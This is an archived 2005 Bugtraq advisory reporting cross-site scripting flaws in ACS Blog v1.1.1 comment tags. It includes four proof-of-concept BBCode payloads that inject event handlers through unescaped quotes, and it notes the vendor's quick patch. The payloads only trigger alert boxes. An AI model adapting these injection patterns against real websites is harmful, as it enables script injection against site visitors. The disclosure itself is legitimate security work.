Multiple XSS vulnerabilities in ACS Blog

From: Dan Crowley (dan.crowley_at_gmail.com)
Date: 03/28/05

Next message: dcrab_at_hackerscenter.com: "Multiple Sql injection, and multiple XSS vulnerabilities in Photopost PHP Pro Photo Gallery Software"

Previous message: Martin Pitt: "[USN-101-1] telnet vulnerabilities"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Date: 28 Mar 2005 21:26:23 -0000
To: bugtraq@securityfocus.com

('binary' encoding is not supported, stored as-is)

These vulnerabilities have been tested on the latest version of ACS Blog. (v1.1.1)

In the comments section of ACS Blog, it is possible to execute an XSS attack through the [link], [mail], and [img] tags, due to lack of filtering of single quotes and spaces inside the tags.

Examples/PoCs:

[link=http://www.google.com' onmouseover='alert("XSS vulnerability")' o=']Don't you wanna see where this link goes?[/link]

[mail=bugtraq@securityfocus.com' onmouseover='alert("XSS vulnerability")' o=']Mr. Wiggles[/mail]

[img]http://www.example.com/image.jpg' onload='alert("XSS vulnerability")' o='[/img]

[link=http://www.google.com target=_blank'
onmouseover=a=/Vulnerability/;alert(a.source) o=']Hooray[/link]

----------
Vendor responded within 2 hours of notification, notified users with the security alert on its main page, and patched the vulnerabilities within another couple of hours.
----------

Cheers,
Dan

Next message: dcrab_at_hackerscenter.com: "Multiple Sql injection, and multiple XSS vulnerabilities in Photopost PHP Pro Photo Gallery Software"

Previous message: Martin Pitt: "[USN-101-1] telnet vulnerabilities"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]